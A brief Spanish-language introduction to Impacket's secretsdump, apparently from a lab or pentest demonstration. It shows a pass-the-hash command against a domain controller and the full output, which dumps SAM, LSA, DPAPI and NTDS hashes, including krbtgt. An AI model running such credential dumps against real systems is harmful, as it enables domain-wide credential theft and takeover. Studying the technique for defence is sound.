Impacket-secretsdump es una herramienta muy utilizada en la seguridad informática y en pruebas de penetración que forma parte de la suite Impacket. Impacket es un conjunto de clases Python para trabajar con protocolos de red. secretsdump.py es un script dentro de esta colección que permite la extracción de hashes de contraseñas, tickets Kerberos y otros secretos del sistema de Windows. Es especialmente útil para la extracción de credenciales cuando se tiene acceso a un controlador de dominio de Windows.
kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 admin@spartancybersec.corp -hashes :64fbae31cc352fc26af97cbdef151e03
Impacketv0.11.0-Copyright2023Fortra[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket[*] Service RemoteRegistry is in stopped state[*] Starting service RemoteRegistry[+] Retrieving class info for JD[+] Retrieving class info for Skew1[+] Retrieving class info for GBG[+] Retrieving class info for Data[*] Target system bootKey: 0x6819873eadf71f0789285138af013772[+] Checking NoLMHash Policy[+] LMHashes are NOT being stored[+] Saving remote SAM database[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)[+] Calculating HashedBootKey from SAM[+] NewStyle hashes is: TrueAdministrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::[+] NewStyle hashes is: TrueGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+] NewStyle hashes is: TrueDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.[+] Saving remote SECURITY database[*] Dumping cached domain logon information (domain/username:hash)[+] Decrypting LSA Key[+] Decrypting NL$KM[+] Looking into NL$1[*] Dumping LSA Secrets[+] Looking into $MACHINE.ACC[*] $MACHINE.ACC SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::[+] Looking into DPAPI_SYSTEM[*] DPAPI_SYSTEM dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18[+] Looking into NL$KM[*] NL$KM 0000 8D D2 8E 67 54 58 89 B1 C9 53 B9 5B 46 A2 B3 66 ...gTX...S.[F..f 0010 D4 3B 95 80 92 7D 67 78 B7 1D F9 2D A5 55 B7 A3 .;...}gx...-.U.. 0020 61 AA 4D 86 95 85 43 86 E3 12 9E C4 91 CF 9A 5B a.M...C........[ 0030 D8 BB 0D AE FA D3 41 E0 D8 66 3D 19 75 A2 D1 B2 ......A..f=.u...NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secrets[+] Session resume file will be sessionresume_uAKYyEam[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500 [+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301} [+] Entering NTDSHashes.__decryptHash[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::